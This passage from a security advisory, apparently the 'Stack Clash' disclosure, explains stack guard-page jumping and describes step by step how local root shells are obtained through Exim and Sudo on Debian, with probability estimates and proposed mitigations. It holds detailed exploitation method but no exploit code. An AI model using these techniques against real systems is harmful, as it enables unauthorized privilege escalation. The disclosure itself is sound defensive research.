protect against this security threat, the kernel maps a \"guard-page\"\nbelow the start of the stack: one or more PROT_NONE pages (or unmappable\npages) that:\n\n- raise a page-fault exception if accessed (before the stack-pointer can\n move from the stack into another memory region);\n\n- terminate the process with a SIGSEGV (because the page-fault handler\n cannot expand the stack if another memory region is mapped directly\n below). \n\nUnfortunately, a stack guard-page of a few kilobytes is insufficient\n(CVE-2017-1000364): if the stack-pointer \"jumps\" over the guard-page --\nif it moves from the stack into another memory region without accessing\nthe guard-page -- then no page-fault exception is raised and the stack\nextends into the other memory region. \n\nThis theoretical vulnerability was first described in Gael Delalleau\u0027s\n2005 presentation (slides 24-29). In the present advisory, we discuss\nits practicalities, and multiple vulnerabilities in stack guard-page\nimplementations (in OpenBSD, NetBSD, and FreeBSD), but we exclude\nrelated vulnerabilities such as unbounded alloca()s and VLAs\n(Variable-Length Arrays) that have been exploited in the past:\n\nhttp://phrack.org/issues/63/14.html\nhttp://blog.exodusintel.com/2013/01/07/who-was-phone/\n\n========================================================================\nII.3. Stack-clash exploitation\n========================================================================\n\n Must be a clash, there\u0027s no alternative. \n --The Clash, \"Kingston Advice\"\n\nOur exploits follow a series of four sequential steps -- each step\nallocates memory that must not be freed before all steps are complete:\n\nStep 1: Clash (the stack with another memory region)\nStep 2: Run (move the stack-pointer to the start of the stack)\nStep 3: Jump (over the stack guard-page, into the other memory region)\nStep 4: Smash (the stack, or the other memory region)\n\n========================================================================\nII.3.1. Step 1: Clash the stack with another memory region\n========================================================================\n\n Have the boys found the leak yet?\n --The Clash, \"The Leader\"\n\nAllocate memory until the start of the stack reaches the end of another\nmemory region, or until the end of another memory region reaches the\nstart of the stack. \n\n- The other memory region can be, for example:\n . the heap;\n . an anonymous mmap();\n . the read-write segment of ld.so;\n . the read-write segment of a PIE, a Position-Independent Executable. \n\n- The memory allocated in this Step 1 can be, for example:\n . stack and heap memory;\n . stack and anonymous mmap() memory;\n . stack memory only. \n\n- The heap and anonymous mmap() memory can be:\n\n . temporarily allocated, but not freed before the stack guard-page is\n jumped over in Step 3 and memory is smashed in Step 4;\n\n . permanently leaked. On Linux, a general method for allocating\n anonymous mmap()s is the LD_AUDIT memory leak that we discovered in\n the ld.so part of the glibc, the GNU C Library (CVE-2017-1000366). \n\n- The stack memory can be allocated, for example:\n\n . through megabytes of command-line arguments and environment\n variables. \n\n On Linux, this general method for allocating stack memory is limited\n by the kernel to 1/4 of the current RLIMIT_STACK (1GB on i386 if\n RLIMIT_STACK is RLIM_INFINITY -- man execve, \"Limits on size of\n arguments and environment\"). \n\n However, as we were drafting this advisory, we realized that the\n kernel imposes this limit on the argument and environment strings,\n but not on the argv[] and envp[] pointers to these strings, and we\n developed alternative versions of our Linux exploits that do not\n depend on application-specific memory leaks (CVE-2017-1000365). through recursive function calls. \n\n On BSD, we discovered a general method for allocating megabytes of\n stack memory: a vulnerability in qsort() that causes this function\n to recurse N/4 times, given a pathological input array of N elements\n (CVE-2017-1000373 in OpenBSD, CVE-2017-1000378 in NetBSD, and\n CVE-2017-1082 in FreeBSD). \n\n- In a few rare cases, Step 1 is not needed, because another memory\n region is naturally mapped directly below the stack (for example,\n ld.so in our Solaris exploit). \n\n========================================================================\nII.3.2. Step 2: Move the stack-pointer to the start of the stack\n========================================================================\n\n Run, run, run, run, run, don\u0027t you know?\n --The Clash, \"Three Card Trick\"\n\nConsume the unused stack memory that separates the stack-pointer from\nthe start of the stack. This Step 2 is similar to Step 3 (\"Jump over the\nstack guard-page\") but is needed because:\n\n- the stack-pointer is usually several kilobytes higher than the start\n of the stack (functions that allocate a large stack-frame decrease the\n start address of the stack, but this address is never increased\n again); moreover:\n\n . the FreeBSD kernel automatically expands the user-space stack of a\n process by multiples of 128KB (SGROWSIZ, in vm_map_growstack());\n\n . the Linux kernel initially expands the user-space stack of a process\n by 128KB (stack_expand, in setup_arg_pages()). \n\n- in Step 3, the stack-based buffer used to jump over the guard-page:\n\n . is usually not large enough to simultaneously move the stack-pointer\n to the start of the stack, and then into another memory region;\n\n . must not be fully written to (a full write would access the stack\n guard-page and terminate the process) but the stack memory consumed\n in this Step 2 can be fully written to (for example, strdupa() can\n be used in Step 2, but not in Step 3). \n\nThe stack memory consumed in this Step 2 can be, for example:\n\n- large stack-frames, alloca()s, or VLAs (which can be detected by\n grsecurity/PaX\u0027s STACKLEAK plugin for GCC,\n https://grsecurity.net/features.php);\n\n- recursive function calls (which can be detected by GNU cflow,\n http://www.gnu.org/software/cflow/);\n\n- on Linux, we discovered that the argv[] and envp[] arrays of pointers\n can be used to consume the 128KB of initial stack expansion, because\n the kernel allocates these arrays on the stack long after the call to\n setup_arg_pages(); this general method for completing Step 2 is\n exploitable locally, but the initial stack expansion poses a major\n obstacle to the remote exploitation of stack-clashes, as mentioned in\n IV.1.1. \n\nIn a few rare cases, Step 2 is not needed, because the stack-pointer is\nnaturally close to the start of the stack (for example, in Exim\u0027s main()\nfunction, the 256KB group_list[] moves the stack-pointer to the start of\nthe stack and beyond). \n\n========================================================================\nII.3.3. Step 3: Jump over the stack guard-page, into another memory\nregion\n========================================================================\n\n You need a little jump of electrical shockers. \n --The Clash, \"Clash City Rockers\"\n\nMove the stack-pointer from the stack and into the memory region that\nclashed with the stack in Step 1, but without accessing the guard-page. \nTo complete this Step 3, a large stack-based buffer, alloca(), or VLA is\nneeded, and:\n\n- it must be larger than the guard-page;\n\n- it must end in the stack, above the guard-page;\n\n- it must start in the memory region below the stack guard-page;\n\n- it must not be fully written to (a full write would access the\n guard-page, raise a page-fault exception, and terminate the process,\n because the memory region mapped directly below the stack prevents the\n page-fault handler from expanding the stack). \n\nIn a few cases, Step 3 is not needed:\n\n- on FreeBSD, a stack guard-page is implemented but disabled by default\n (CVE-2017-1083);\n\n- on OpenBSD, NetBSD, and FreeBSD, we discovered implementation\n vulnerabilities that eliminate the stack guard-page (CVE-2017-1000372,\n CVE-2017-1000374, CVE-2017-1084). \n\nOn Linux, we devised general methods for jumping over the stack\nguard-page (CVE-2017-1000366):\n\n- The glibc\u0027s __dcigettext() function alloca()tes single_locale, a\n stack-based buffer of up to 128KB (MAX_ARG_STRLEN, man execve), the\n length of the LANGUAGE environment variable (if the current locale is\n neither \"C\" nor \"POSIX\", but distributions install default locales\n such as \"C.UTF-8\" and \"en_US.utf8\"). \n\n If LANGUAGE is mostly composed of \u0027:\u0027 characters, then single_locale\n is barely written to, and can be used to jump over the stack\n guard-page. \n\n Moreover, if __dcigettext() finds the message to be translated, then\n _nl_find_msg() strdup()licates the OUTPUT_CHARSET environment variable\n and allows a local attacker to immediately smash the stack and gain\n control of the instruction pointer (the eip register, on i386), as\n detailed in Step 4a. \n\n We exploited this stack-clash against Sudo and su, but most of the\n SUID (set-user-ID) and SGID (set-group-ID) binaries that call\n setlocale(LC_ALL, \"\") and __dcigettext() or its derivatives (the\n *gettext() functions, the _() convenience macro, the strerror()\n function) are exploitable. \n\n- The glibc\u0027s vfprintf() function (called by the *printf() family of\n functions) alloca()tes a stack-based work buffer of up to 64KB\n (__MAX_ALLOCA_CUTOFF) if a width or precision is greater than 1KB\n (WORK_BUFFER_SIZE). \n\n If the corresponding format specifier is %s then this work buffer is\n never written to and can be used to jump over the stack guard-page. \n\n None of our exploits is based on this method, but it was one of our\n ideas to exploit Exim remotely, as mentioned in IV.1.1. \n\n- The glibc\u0027s getaddrinfo() function calls gaih_inet(), which\n alloca()tes tmpbuf, a stack-based buffer of up to 64KB\n (__MAX_ALLOCA_CUTOFF) that may be used to jump over the stack\n guard-page. \n\n Moreover, gaih_inet() calls the gethostbyname*() functions, which\n malloc()ate a heap-based DNS response of up to 64KB (MAXPACKET) that\n may allow a remote attacker to immediately smash the stack, as\n detailed in Step 4a. \n\n None of our exploits is based on this method, but it may be the key to\n the remote exploitation of stack-clashes. \n\n- The glibc\u0027s run-time dynamic linker ld.so alloca()tes llp_tmp, a\n stack-based copy of the LD_LIBRARY_PATH environment variable. If\n LD_LIBRARY_PATH contains Dynamic String Tokens (DSTs), they are first\n expanded: llp_tmp can be larger than 128KB (MAX_ARG_STRLEN) and not\n fully written to, and can therefore be used to jump over the stack\n guard-page and smash the memory region mapped directly below, as\n detailed in Step 4b. \n\n We exploited this ld.so stack-clash in two data-only attacks that\n bypass NX (No-eXecute) and ASLR (Address Space Layout Randomization)\n and obtain a privileged shell through most SUID and SGID binaries on\n most i386 Linux distributions. \n\n- Several local and remote applications allocate a 256KB stack-based\n \"gid_t buffer[NGROUPS_MAX];\" that is not fully written to and can be\n used to move the stack-pointer to the start of the stack (Step 2) and\n jump over the guard-page (Step 3). For example, Exim\u0027s main() function\n and older versions of util-linux\u0027s su. \n\n None of our exploits is based on this method, but an experimental\n version of our Exim exploit unexpectedly gained control of eip after\n the group_list[] buffer had jumped over the stack guard-page. \n\n========================================================================\nII.3.4. Step 4: Either smash the stack with another memory region (Step\n4a) or smash another memory region with the stack (Step 4b)\n========================================================================\n\n Smash and grab, it\u0027s that kind of world. \n --The Clash, \"One Emotion\"\n\nIn Step 3, a function allocates a large stack-based buffer and jumps\nover the stack guard-page into the memory region mapped directly below;\nin Step 4, before this function returns and jumps back into the stack:\n\n- Step 4a: a write to the memory region mapped below the stack (where\n esp still points to) effectively smashes the stack. We exploit this\n general method for completing Step 4 in Exim, Sudo, and su:\n\n . we overwrite a return-address on the stack and gain control of eip;\n\n . we return-into-libc (into system() or __libc_dlopen()) to defeat NX;\n\n . we brute-force ASLR (8 bits of entropy) if CVE-2016-3672 is patched;\n\n . we bypass SSP (Stack-Smashing Protector) because we overwrite the\n return-address of a function that is not protected by a stack canary\n (the memcpy() that smashes the stack usually overwrites its own\n stack-frame and return-address). \n\n- Step 4b: a write to the stack effectively smashes the memory region\n mapped below (where esp still points to). This second method for\n completing Step 4 is application-specific (it depends on the contents\n of the memory region that we smash) unless we exploit the run-time\n dynamic linker ld.so:\n\n . on Solaris, we devised a general method for smashing ld.so\u0027s\n read-write segment, overwriting one of its function pointers, and\n executing our own shell-code;\n\n . on Linux, we exploited most SUID and SGID binaries through ld.so:\n our \"hwcap\" exploit smashes an mmap()ed string, and our \".dynamic\"\n exploit smashes a PIE\u0027s read-write segment before it is mprotect()ed\n read-only by Full RELRO (Full RELocate Read-Only -- GNU_RELRO and\n BIND_NOW). \n\n\n========================================================================\nIII. Solutions\n========================================================================\n\nBased on our research, we recommend that the affected operating systems:\n\n- Increase the size of the stack guard-page to at least 1MB, and allow\n system administrators to easily modify this value (for example,\n grsecurity/PaX introduced /proc/sys/vm/heap_stack_gap in 2010). \n\n This first, short-term solution is cheap, but it can be defeated by a\n very large stack-based buffer. \n\n- Recompile all userland code (ld.so, libraries, binaries) with GCC\u0027s\n \"-fstack-check\" option, which prevents the stack-pointer from moving\n into another memory region without accessing the stack guard-page (it\n writes one word to every 4KB page allocated on the stack). \n\n This second, long-term solution is expensive, but it cannot be\n defeated (even if the stack guard-page is only 4KB, one page) --\n unless a vulnerability is discovered in the implementation of the\n stack guard-page or the \"-fstack-check\" option. \n\n\n========================================================================\nIV. Results\n========================================================================\n\n========================================================================\nIV.1. Linux\n========================================================================\n\n========================================================================\nIV.1.1. Exim\n========================================================================\n\nDebian 8.5\n\nCrude exploitation\n\nOur first exploit, a Local Privilege Escalation against Exim\u0027s SUID-root\nPIE (Position-Independent Executable) on i386 Debian 8.5, simply follows\nthe four sequential steps outlined in II.3. \n\nStep 1: Clash the stack with the heap\n\nTo reach the start of the stack with the end of the heap (man brk), we\npermanently leak memory through multiple -p command-line arguments that\nare malloc()ated by Exim but never free()d (CVE-2017-1000369) -- we call\nsuch a malloc()ated chunk of heap memory a \"memleak-chunk\". \n\nBecause the -p argument strings are originally allocated on the stack by\nexecve(), we must cover half of the initial heap-stack distance (between\nthe start of the heap and the end of the stack) with stack memory, and\nhalf of this distance with heap memory. \n\nIf we set the RLIMIT_STACK to 136MB (MIN_GAP, arch/x86/mm/mmap.c) then\nthe initial heap-stack distance is minimal (randomized in a [96MB,137MB]\nrange), but we cannot reach the stack with the heap because of the 1/4\nlimit imposed by the kernel on the argument and environment strings (man\nexecve): 136MB/4=34MB of -p argument strings cannot cover 96MB/2=48MB,\nhalf of the minimum heap-stack distance. \n\nMoreover, if we increase the RLIMIT_STACK, the initial heap-stack\ndistance also increases and we still cannot reach the stack with the\nheap. However, if we set the RLIMIT_STACK to RLIM_INFINITY (4GB on i386)\nthen the kernel switches from the default top-down mmap() layout to a\nlegacy bottom-up mmap() layout, and:\n\n- the initial heap-stack distance is approximately 2GB, because the\n start of the heap (the initial brk()) is randomized above the address\n 0x40000000, and the end of the stack is randomized below the address\n 0xC0000000;\n\n- we can reach the stack with the heap, despite the 1/4 limit imposed by\n the kernel on the argument and environment strings, because 4GB/4=1GB\n of -p argument strings can cover 2GB/2=1GB, half of the initial\n heap-stack distance;\n\n- we clash the stack with the heap around the address 0x80000000. \n\nStep 2: Move the stack-pointer (esp) to the start of the stack\n\nThe 256KB stack-based group_list[] in Exim\u0027s main() naturally consumes\nthe 128KB of initial stack expansion, as mentioned in II.3.2. \n\nStep 3: Jump over the stack guard-page and into the heap\n\nTo move esp from the start of the stack into the heap, without accessing\nthe stack guard-page, we use a malformed -d command-line argument that\nis written to the 32KB (STRING_SPRINTF_BUFFER_SIZE) stack-based buffer\nin Exim\u0027s string_sprintf() function. This buffer is not fully written to\nand hence does not access the stack guard-page, because our -d argument\nstring is much shorter than 32KB. \n\nStep 4a: Smash the stack with the heap\n\nBefore string_sprintf() returns (and moves esp from the heap back into\nthe stack) it calls string_copy(), which malloc()ates and memcpy()es our\n-d argument string to the end of the heap, where esp still points to --\nwe call this malloc()ated chunk of heap memory the \"smashing-chunk\". \n\nThis call to memcpy() therefore smashes its own stack-frame (which is\nnot protected by SSP) with the contents of our smashing-chunk, and we\noverwrite memcpy()\u0027s return-address with the address of libc\u0027s system()\nfunction (which is not randomized by ASLR because Debian 8.5 is\nvulnerable to CVE-2016-3672):\n\n- instead of smashing memcpy()\u0027s stack-frame with an 8-byte pattern (the\n return-address to system() and its argument) we smash it with a simple\n 4-byte pattern (the return-address to system()), append \".\" to the\n PATH environment variable, and symlink() our exploit to the string\n that begins at the address of libc\u0027s system() function;\n\n- system() does not drop our escalated root privileges, because Debian\u0027s\n /bin/sh is dash, not bash and its -p option (man bash). \n\nThis first version of our Exim exploit obtained a root-shell after\nnearly a week of failed attempts; to improve this result, we analyzed\nevery step of a successful run. \n\nRefined exploitation\n\nStep 1: Clash the stack with the heap\n\n+ The heap must be able to reach the stack [Condition 1]\n\nThe start of the heap is randomized in the 32MB range above the end of\nExim\u0027s PIE (the end of its .bss section), but the growth of the heap is\nsometimes blocked by libraries that are mmap()ed within the same range\n(because of the legacy bottom-up mmap() layout). On Debian 8.5, Exim\u0027s\nlibraries occupy about 8MB and thus block the growth of the heap with a\nprobability of 8MB/32MB = 1/4. \n\nWhen the heap is blocked by the libraries, malloc() switches from brk()\nto mmap()s of 1MB (MMAP_AS_MORECORE_SIZE), and our memory leak reaches\nthe stack with mmap()s instead of the heap. Such a stack-clash is also\nexploitable, but its probability of success is low, as detailed in\nIV.1.6., and we therefore discarded this approach. \n\n+ The heap must always reach the stack, when not blocked by libraries\n\nBecause the initial heap-stack distance (between the start of the heap\nand the end of the stack) is a random variable:\n\n- either we allocate the exact amount of heap memory to cover the mean\n heap-stack distance, but the probability of success of this approach\n is low and we therefore discarded it;\n\n- or we allocate enough heap memory to always reach the stack, even when\n the initial heap-stack distance is maximal; after the heap reaches the\n stack, our memory leak allocates mmap()s of 1MB above the stack (below\n 0xC0000000) and below the heap (above the libraries), but it must not\n exhaust the address-space (the 1GB below 0x40000000 is unmappable);\n\n- the final heap-stack distance (between the end of the heap and the\n start of the stack) is also a random variable:\n\n . its minimum value is 8KB (the stack guard-page, plus a safety page\n imposed by the brk() system-call in mm/mmap.c);\n\n . its maximum value is roughly the size of a memleak-chunk, plus 128KB\n (DEFAULT_TOP_PAD, malloc/malloc.c). \n\nStep 3: Jump over the stack guard-page and into the heap\n\n- The stack-pointer must jump over the guard-page and land into the free\n chunk at the end of the heap (the remainder of the heap after malloc()\n switches from brk() to mmap()), where both the smashing-chunk and\n memcpy()\u0027s stack-frame are allocated and overwritten in Step 4a\n [Condition 2];\n\n- The write (of approximately smashing-chunk bytes) to\n string_sprintf()\u0027s stack-based buffer (which starts where the\n guard-page jump lands) must not crash into the end of the heap\n [Condition 3]. \n\nStep 4a: Smash the stack with the heap\n\nThe smashing-chunk must be allocated into the free chunk at the end of\nthe heap:\n\n- the smashing-chunk must not be allocated into the free chunks left\n over at the end of the 1MB mmap()s [Condition 4];\n\n- the memleak-chunks must not be allocated into the free chunk at the\n end of the heap [Condition 5]. \n\nIntuitively, the probability of gaining control of eip depends on the\nsize of the smashing-chunk (the guard-page jump\u0027s landing-zone) and the\nsize of the memleak-chunks (which determines the final heap-stack\ndistance). \n\nTo maximize this probability, we wrote a helper program that imposes the\nfollowing conditions on the smashing-chunk and memleak-chunks:\n\n- the smashing-chunk must be smaller than 32KB\n (STRING_SPRINTF_BUFFER_SIZE) [Condition 3];\n\n- the memleak-chunks must be smaller than 128KB (DEFAULT_MMAP_THRESHOLD,\n malloc/malloc.c);\n\n- the free chunk at the end of the heap must be larger than twice the\n smashing-chunk size [Conditions 2 and 3];\n\n- the free chunk at the end of the heap must be smaller than the\n memleak-chunk size [Condition 5];\n\n- when the final heap-stack distance is minimal, the 32KB\n (STRING_SPRINTF_BUFFER_SIZE) guard-page jump must land below the free\n chunk at the end of the heap [Condition 2];\n\n- the free chunks at the end of the 1MB mmap()s must be:\n\n . either smaller than the smashing-chunk [Condition 4];\n\n . or larger than the free chunk at the end of the heap (glibc\u0027s\n malloc() is a best-fit allocator) [Condition 4]. \n\nThe resulting smashing-chunk and memleak-chunk sizes are:\n\nsmash: 10224 memleak: 27656 brk_min: 20464 brk_max: 24552 mmap_top: 25304\nprobability: 1/16 (0.06190487817)\n\nIn theory, the probability of gaining control of eip is 1/21: the\nproduct of the 1/16 probability calculated by this helper program\n(approximately (smashing-chunk / (memleak-chunk + DEFAULT_TOP_PAD))) and\nthe 3/4 probability of reaching the stack with the heap [Condition 1]. \n\nIn practice, on Debian 8.5, our final Exim exploit:\n\n- gains eip control in 1 run out of 28, on average;\n\n- takes 2.5 seconds per run (on a 4GB Virtual Machine);\n\n- has a good chance of obtaining a root-shell after 28*2.5 = 70 seconds;\n\n- uses 4GB of memory (2GB in the Exim process, and 2GB in the process\n fork()ed by system()). \n\nDebian 8.6\n\nUnlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672: after\ngaining eip control in Step 4a (Smash), the probability of successfully\nreturning-into-libc\u0027s system() function is 1/256 (8 bits of entropy --\nlibraries are randomized in a 1MB range but aligned on 4KB). \n\nConsequently, our final Exim exploit has a good chance of obtaining a\nroot-shell on Debian 8.6 after 256*28*2.5 seconds = 5 hours (256*28=7168\nruns). \n\nAs we were drafting this advisory, we tried an alternative approach\nagainst Exim on Debian 8.6: we discovered that its stack is executable,\nbecause it depends on libgnutls-deb0, which depends on libp11-kit, which\ndepends on libffi, which incorrectly requires an executable GNU_STACK\n(CVE-2017-1000376). \n\nInitially, we discarded this approach because our 1GB of -p argument\nstrings on the stack is not executable (_dl_make_stack_executable() only\nmprotect()s the stack below argv[] and envp[]):\n\n41e00000-723d7000 rw-p 00000000 00:00 0 [heap]\n802f1000-80334000 rwxp 00000000 00:00 0 [stack]\n80334000-bfce6000 rw-p 00000000 00:00 0\n\nand because the stack is randomized in an 8MB range but we do not\ncontrol the contents of any large buffer on the executable stack. \n\nLater, we discovered that two 128KB (MAX_ARG_STRLEN) copies of the\nLD_PRELOAD environment variable can be allocated onto the executable\nstack by ld.so\u0027s dl_main() and open_path() functions, automatically\nfreed upon return from these functions, and re-allocated (but not\noverwritten) by Exim\u0027s 256KB stack-based group_list[]. \n\nIn theory, the probability of returning into our shell-code (into these\nexecutable copies of LD_PRELOAD) is 1/32 (2*128KB/8MB), higher than the\n1/256 probability of returning-into-libc. In practice, this alternative\nExim exploit has a good chance of obtaining a root-shell after 1174 runs\n-- instead of 32*28=896 runs in theory, because the two 128KB copies of\nLD_PRELOAD are never perfectly aligned with Exim\u0027s 256KB group_list[] --\nor 1174*2.5 seconds = 50 minutes. \n\nDebian 9 and 10\n\nUnlike Debian 8, Debian 9 and 10 are not vulnerable to offset2lib, a\nminor weakness in Linux\u0027s ASLR that coincidentally affects Step 1\n(Clash) of our stack-clash exploits:\n\nhttps://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html\nhttps://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d1fd836dcf00d2028c700c7e44d2c23404062c90\n\nIf we set RLIMIT_STACK to RLIM_INFINITY, the kernel still switches to\nthe legacy bottom-up mmap() layout, and the libraries are randomized in\nthe 1MB range above the address 0x40000000, but Exim\u0027s PIE is randomized\nin the 1MB range above the address 0x80000000 and the heap is randomized\nin the 32MB range above the PIE\u0027s .bss section. As a result:\n\n- the heap is always able to reach the stack, because its growth is\n never blocked by the libraries -- the theoretical probability of\n gaining eip control is 1/16, the probability calculated by our helper\n program;\n\n- the heap clashes with the stack around the address 0xA0000000, because\n the initial heap-stack distance is 1GB (0xC0000000-0x80000000) and can\n be covered with 512MB of heap memory and 512MB of stack memory. \n\nRemote exploitation\n\nExim\u0027s string_sprintf() or glibc\u0027s vfprintf() can be used to remotely\ncomplete Steps 3 and 4 of the stack-clash; and the 256KB group_list[] in\nExim\u0027s main() naturally consumes the 128KB of initial stack expansion in\nStep 2; but another 256KB group_list[] in Exim\u0027s exim_setugid() further\ndecreases the start address of the stack and prevents us from remotely\ncompleting Step 2 and exploiting Exim. \n\n========================================================================\nIV.1.2. Sudo\n========================================================================\n\nIntroduction\n\nWe discovered a vulnerability in Sudo\u0027s get_process_ttyname() for Linux:\nthis function opens \"/proc/[pid]/stat\" (man proc) and reads the device\nnumber of the tty from field 7 (tty_nr). Unfortunately, these fields are\nspace-separated and field 2 (comm, the filename of the command) can\ncontain spaces (CVE-2017-1000367). \n\nFor example, if we execute Sudo through the symlink \"./ 1 \",\nget_process_ttyname() calls sudo_ttyname_dev() to search for the\nnon-existent tty device number \"1\" in the built-in search_devs[]. \n\nNext, sudo_ttyname_dev() calls the recursive function\nsudo_ttyname_scan() to search for this non-existent tty device number\n\"1\" in a breadth-first traversal of \"/dev\". \n\nLast, we exploit this recursive function during its traversal of the\nworld-writable \"/dev/shm\", and allocate hundreds of megabytes of heap\nmemory from the filesystem (directory pathnames) instead of the stack\n(the command-line arguments and environment variables allocated by our\nother stack-clash exploits). \n\nStep 1: Clash the stack with the heap\n\nsudo_ttyname_scan() strdup()licates the pathnames of the directories and\nsub-directories that it traverses, but does not free() them until it\nreturns. Each one of these \"memleak-chunks\" allocates at most 4KB\n(PATH_MAX) of heap memory. \n\nStep 2: Move the stack-pointer to the start of the stack\n\nThe recursive calls to sudo_ttyname_scan() allocate 4KB (PATH_MAX)\nstack-frames that naturally consume the 128KB of initial stack\nexpansion. \n\nStep 3: Jump over the stack guard-page and into the heap\n\nIf the length of a directory pathname reaches 4KB (PATH_MAX),\nsudo_ttyname_scan() calls warning(), which calls strerror() and _(),\nwhich call gettext() and allow us to jump over the stack guard-page with\nan alloca() of up to 128KB (the LANGUAGE environment variable), as\nexplained in II.3.3. \n\nStep 4a: Smash the stack with the heap\n\nThe self-contained gettext() exploitation method malloc()ates and\nmemcpy()es a \"smashing-chunk\" of up to 128KB (the OUTPUT_CHARSET\nenvironment variable) that smashes memcpy()\u0027s stack-frame and\nreturn-address, as explained in II.3.4. \n\nDebian 8.5\n\nStep 1: Clash the stack with the heap\n\nDebian 8.5 is vulnerable to CVE-2016-3672: if we set RLIMIT_STACK to\nRLIM_INFINITY, the kernel switches to the legacy bottom-up mmap() layout\nand disables the ASLR of Sudo\u0027s PIE and libraries, but still the initial\nheap-stack distance is randomized and roughly 2GB (0xC0000000-0x40000000\n-- the start of the heap is randomized in a 32MB range above 0x40000000,\nand the end of the stack is randomized in the 8MB range below\n0xC0000000). \n\nTo reach the start of the stack with the end of the heap, we allocate\nhundreds of megabytes of heap memory from the filesystem (directory\npathnames), and:\n\n- the heap must be able to reach the stack -- on Debian 8.5, Sudo\u0027s\n libraries occupy about 3MB and hence block the growth of the heap with\n a probability of 3MB/32MB ~= 1/11;\n\n- when not blocked by the libraries, the heap must always reach the\n stack, even when the initial heap-stack distance is maximal (as\n detailed in IV.1.1.);\n\n- we cover half of the initial heap-stack distance with 1GB of heap\n memory (the memleak-chunks, strdup()licated directory pathnames);\n\n- we cover the other half of this distance with 1GB of stack memory (the\n maximum permitted by the kernel\u0027s 1/4 limit on the argument and\n environment strings) and thus reduce our on-disk inode usage;\n\n- we redirect sudo_ttyname_scan()\u0027s traversal of /dev to /var/tmp\n (through a symlink planted in /dev/shm) to work around the small\n number of inodes available in /dev/shm. \n\nAfter the heap reaches the stack and malloc() switches from brk() to\nmmap()s of 1MB:\n\n- the size of the free chunk left over at the end of the heap is a\n random variable in the [0B,4KB] range -- 4KB (PATH_MAX) is the\n approximate size of a memleak-chunk;\n\n- the final heap-stack distance (between the end of the heap and the\n start of the stack) is a random variable in the [8KB,4KB+128KB=132KB]\n range -- the size of a memleak-chunk plus 128KB (DEFAULT_TOP_PAD);\n\n- sudo_ttyname_scan() recurses a few more times and therefore allocates\n more stack memory, but this stack expansion is blocked by the heap and\n crashes into the stack guard-page after 16 recursions on average\n (132KB/4KB/2, where 132KB is the maximum final heap-stack distance,\n and 4KB is the size of sudo_ttyname_scan()\u0027s stack-frame). \n\nTo solve this unexpected problem, we:\n\n- first, redirect sudo_ttyname_scan() to a directory tree \"A\" in\n /var/tmp that recurses and allocates stack memory, but does not\n allocate heap memory (each directory level contains only one entry,\n the sub-directory that is connected to the next directory level);\n\n- second, redirect sudo_ttyname_scan() to a directory tree \"B\" in\n /var/tmp that recurses and allocates heap memory (each directory level\n contains many entries), but does not allocate more stack memory (it\n simply consumes the stack memory that was already allocated by the\n directory tree \"A\"): it does not further expand the stack, and does\n not crash into the guard-page. \n\nFinally, we increase the speed of our exploit and avoid thousands of\nuseless recursions:\n\n- in each directory level traversed by sudo_ttyname_scan(), we randomly\n modify the names of its sub-directories until the first call to\n readdir() returns the only sub-directory that is connected to the next\n level of the directory tree (all other sub-directories allocate heap\n memory but are otherwise empty);\n\n- we dup2() Sudo\u0027s stdout and stderr to a pipe with no readers that\n terminates Sudo with a SIGPIPE if sudo_ttyname_scan() calls warning()\n and sudo_printf() (a failed exploit attempt, usually because the final\n heap-stack distance is much longer or shorter than the guard-page\n jump). \n\nStep 2: Move the stack-pointer to the start of the stack\n\nsudo_ttyname_scan() allocates a 4KB (PATH_MAX) stack-based pathbuf[]\nthat naturally consumes the 128KB of initial stack expansion in fewer\nthan 128KB/4KB=32 recursive calls. \n\nThe recursive calls to sudo_ttyname_scan() allocate less than 8MB of\nstack memory: the maximum number of recursions (PATH_MAX / strlen(\"/a\")\n= 2K) multiplied by the size of sudo_ttyname_scan()\u0027s stack-frame (4KB). \n\nStep 3: Jump over the stack guard-page and into the heap\n\nThe length of the guard-page jump in gettext() is the length of the\nLANGUAGE environment variable (at most 128KB, MAX_ARG_STRLEN): we take a\n64KB jump, well within the range of the final heap-stack distance; this\njump then lands into the free chunk at the end of the heap, where the\nsmashing-chunk will be allocated in Step 4a, with a probability of\n(smashing-chunk / (memleak-chunk + DEFAULT_TOP_PAD)). \n\nIf available, we assign \"C.UTF-8\" to the LC_ALL environment variable,\nand prepend \"be\" to our 64KB LANGUAGE environment variable, because\nthese minimal locales do not interfere with our heap feng-shui. \n\nStep 4a: Smash the stack with the heap\n\nIn gettext(), the smashing-chunk (a malloc() and memcpy() of the\nOUTPUT_CHARSET environment variable) must be allocated into the free\nchunk at the end of the heap, where the stack-frame of memcpy() is also\nallocated. \n\nFirst, if the size of our memleak-chunks is exactly 4KB+8B\n(PATH_MAX+MALLOC_ALIGNMENT), then:\n\n- the size of the free chunk at the end of the heap is a random variable\n in the [0B,4KB] range;\n\n- the size of the free chunks left over at the end of the 1MB mmap()s is\n roughly 1MB%(4KB+8B)=2KB. \n\nSecond, if the size of our smashing-chunk is about 2KB+256B\n(PATH_MAX/2+NAME_MAX), then:\n\n- it is always larger than (and never allocated into) the free chunks at\n the end of the 1MB mmap()s;\n\n- it is smaller than (and allocated into) the free chunk at the end of\n the heap with a probability of roughly 1-(2KB+256B)/4KB. \n\nLast, in each level of our directory tree \"B\", sudo_ttyname_scan()\nmalloc()ates and realloc()ates an array of pointers to sub-directories,\nbut these realloc()s prevent the smashing-chunk from being allocated\ninto the free chunk at the end of the heap:\n\n- they create holes in the heap, where the smashing-chunk may be\n allocated to;\n\n- they may allocate the free chunk at the end of the heap, where the\n smashing-chunk should be allocated to. \n\nTo solve these problems, we carefully calculate the number of\nsub-directories in each level of our directory tree \"B\":\n\n- we limit the size of the realloc()s -- and hence the size of the holes\n that they create -- to 4KB+2KB:\n\n . either a memleak-chunk is allocated into such a hole, and the\n remainder is smaller than the smashing-chunk (\"not a fit\");\n\n . or such a hole is not allocated, but it is larger than the largest\n free chunk at the end of the heap (\"a worse fit\");\n\n- we gradually reduce the final size of the realloc()s in the last\n levels of our directory tree \"B\", and hence re-allocate the holes\n created in the previous levels. \n\nIn theory, on Debian 8.5, the probability of gaining control of eip is\napproximately 1/148, the product of:\n\n- (Step 1) the probability of reaching the stack with the heap:\n 1-3MB/32MB;\n\n- (Step 3) the probability of jumping over the stack guard-page and into\n the free chunk at the end of the heap: (2KB+256B) / (4KB+8B + 128KB);\n\n- (Step 4a) the probability of allocating the smashing-chunk into the\n free chunk at the end of the heap: 